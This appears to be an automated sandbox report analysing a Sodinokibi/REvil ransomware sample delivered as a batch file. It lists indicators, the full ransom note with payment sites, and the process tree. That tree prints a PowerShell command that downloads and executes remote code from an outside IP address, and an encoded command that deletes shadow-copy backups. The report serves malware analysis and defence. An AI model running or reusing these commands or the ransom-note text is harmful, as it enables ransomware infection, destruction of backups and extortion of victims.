Analysis

  • max time kernel
    142s
  • resource
    win7v191014
  • submitted
    02-12-2019 12:59

General

  • Target

    Za3T5yJk.bat

  • Sample

    191202-jgvmtmfvls

  • SHA256

    5c782b58ddf8cc3df5b65372060b30f699e27c7a32adff8a14f826a49e0d7ac8

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/Za3T5yJk

Extracted

Language
ps1
Source

Extracted

Path

C:\1cj0s8-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 1cj0s8. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/375EF44F9DFADBCD 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/375EF44F9DFADBCD Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: bSthU/0r7Ewj1UryzURsrZK+pALEMXKit2LfJzo7B/2165JC6A7Q6l6jstP+tdTv /F5KozFtinTEd3azYJlO2pCTFv0LdJIycNPTmUpGJbvP/yqpEndk/wJcKRdutX6S Mtpcc2bVnApT6N0j9XMYotKG6OgnC7U+15K3APdukINEijHYSNJODEYKlBvWmqfr ic15VPJp9b/ZXAa5Yn611Kzl2HenWulwsgRRDnIlmV7qilcvNkKCrhMhtbjqCfdY qfrOhddzNEupIzmoklnG5CEH/xj2KuQf8QemMTboS0q3IMS4kVFntoMP2HQlHOGD ssqKMl0lxvLwa4xIoy1/Br3hQx32GmqhTUvB4RZ0l82wXfJD2wgxhMN35YbeWwEw IrLDhosXHRCTTH54R99MSe48i8lra5RWyunSlJQ+l+CAXCyf4x2/Jc6XlfmO0Yt5 Fxqg7iKkF8OZAWBWLSkBzlTBC+2HXeOU/fbHDbBp0PxEjulTr3BZSmtWNf47tYJy RXyuLni9jsS2CURA6/PlH2+lQSFEs88F9cL5K+frqt4tctaNGqp5ewttE78B9CxR bzUh1Wv2mR8anGU8IxNc6c9qwAkDy1Hm9xNdHGCUhhs6aID6m+pJzLniqR90/d8F 1BW0kAG8YHR7rr14XFgRnHfRdZXiAE7WveWVks/JpGAy6ArYaLAwZo336DAXaB17 WwMkwqnkUdLIXxvkpPWccSaS/cbeeHoA/uwKRkH97iSsyQsrSLVflac669S45nv/ A7hx1JstBlY/K3g5A/ejZYSaAEdCw+YGQn0uA6NqlUcgnRuA238C6kQS0Rn8qytq Pb2rRYm/rF9eL0gdoRxX2M62znYoO4eKRB6RvlHxH5H6MEt0l0Q+u+dU1yW2Y77N YK42PGUbLXb7f1GdP5YDA+bsFC4fahjBFmOocmrn7EIzNBGkp7pUkMO81Q0Y2jrC aUYJILAN871UCTxlY3eUb1BpGUKpWgeFUAOKD0k5Eb32T3kHCaBn+PHgXY1jawsh vK3N9zUtKZgv3xbDS9JsyWtQjs+PtYDnXjjvyad0m5DgyoyyOdkzIop6iSHlXQ8W Bmv1Y3Lqa4QB+Gd4WONUCnWVDV4wGh4nPlB/1QXiRkeFio2nvkuyRn/4TZKl3tYt iyRGbIBB0crlQPmx Extension name: 1cj0s8 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/375EF44F9DFADBCD

http://decryptor.top/375EF44F9DFADBCD

Signatures

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Drops file in Program Files directory 33 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Za3T5yJk.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Za3T5yJk');Invoke-KQMRZLUDUPNBP;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Discovering connected drives
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      PID:1296
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Discovering connected drives
        • Suspicious behavior: EnumeratesProcesses
        PID:1256
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1710530788-884321838-11720525346602920-867656955-17023260941461767117176624240"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1044
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-12734847781643596584423841872201330664-58296503-2063759584-1024489525693646570"
    1⤵
      PID:1456
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1444

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms